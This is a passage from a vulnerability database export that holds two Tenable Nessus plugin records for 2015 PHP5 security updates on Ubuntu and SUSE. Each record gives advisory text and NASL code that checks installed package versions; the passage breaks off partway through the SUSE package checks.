"2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-fpm", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2758-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86221", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2758-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86221);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5589\", \"CVE-2015-5590\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"USN\", value:\"2758-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : php5 vulnerabilities (USN-2758-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the PHP phar extension incorrectly handled\ncertain files. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service. (CVE-2015-5589)\n\nIt was discovered that the PHP phar extension incorrectly handled\ncertain filepaths. A remote attacker could use this issue to cause PHP\nto crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2015-5590)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6831, CVE-2015-6834, CVE-2015-6835\n\nSean Heelan discovered that PHP incorrectly handled unserializing\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6832)\n\nIt was discovered that the PHP phar extension incorrectly handled\ncertain archives. A remote attacker could use this issue to cause\nfiles to be placed outside of the destination directory.\n(CVE-2015-6833)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly\nvalidated data types. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2015-6836)\n\nIt was discovered that the PHP XSLTProcessor class incorrectly handled\ncertain data. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service. (CVE-2015-6837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2758-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.10-1ubuntu3.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.10-1ubuntu3.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cli\", pkgver:\"5.3.10-1ubuntu3.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-fpm\", pkgver:\"5.3.10-1ubuntu3.20\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.5.9+dfsg-1ubuntu4.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cgi\", pkgver:\"5.5.9+dfsg-1ubuntu4.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cli\", pkgver:\"5.5.9+dfsg-1ubuntu4.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-fpm\", pkgver:\"5.5.9+dfsg-1ubuntu4.13\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.6.4+dfsg-4ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"php5-cgi\", pkgver:\"5.6.4+dfsg-4ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"php5-cli\", pkgver:\"5.6.4+dfsg-4ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"php5-fpm\", pkgver:\"5.6.4+dfsg-4ubuntu6.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / php5-cgi / php5-cli / php5-fpm\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-08T14:12:52", "description": "This update of PHP5 brings several security fixes.\n\nSecurity fixes :\n\n - CVE-2015-6831: A use after free vulnerability in unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#942291] [bnc#942294] [bnc#942295]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type confusion leading to remote code execution problem was fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nIt also includes a bugfix for the odbc module :\n\n - compare with SQL_NULL_DATA correctly [bnc#935074]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2015-10-27T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2015:1818-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53", "p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-bz2", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-exif", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-json", "p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1818-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86616", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1818-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86616);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-6831\", \"CVE-2015-6833\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2015:1818-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of PHP5 brings several security fixes.\n\nSecurity fixes :\n\n - CVE-2015-6831: A use after free vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#942291]\n [bnc#942294] [bnc#942295]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type\n confusion leading to remote code execution problem was\n fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer\n dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nIt also includes a bugfix for the odbc module :\n\n - compare with SQL_NULL_DATA correctly [bnc#935074]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6831/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6833/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6838/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151818-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?db1bd10e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-php53-12163=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP3 :\n\nzypper in -t patch sdksp3-php53-12163=1\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-php53-12163=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-php53-12163=1\n\nSUSE Linux Enterprise Server 11-SP3 :\n\nzypper in -t patch slessp3-php53-12163=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-php53-12163=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-php53-12163=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"apache2-mod_php53-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bcmath-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bz2-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-calendar-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ctype-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-curl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dba-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dom-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-exif-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fastcgi-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fileinfo-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ftp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gd-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gettext-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gmp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-iconv-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-intl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-json-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ldap-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mbstring-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mcrypt-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mysql-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-odbc-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-openssl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pcntl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pdo-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pear-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pgsql-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pspell-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-shmop-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-snmp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-soap-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-suhosin-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvmsg-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvsem-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvshm-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-tokenizer-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-wddx-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlreader-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlrpc-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlwriter-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xsl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zip-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zlib-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"apache2-mod_php53-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-bcmath-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-bz2-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-calendar-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ctype-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", 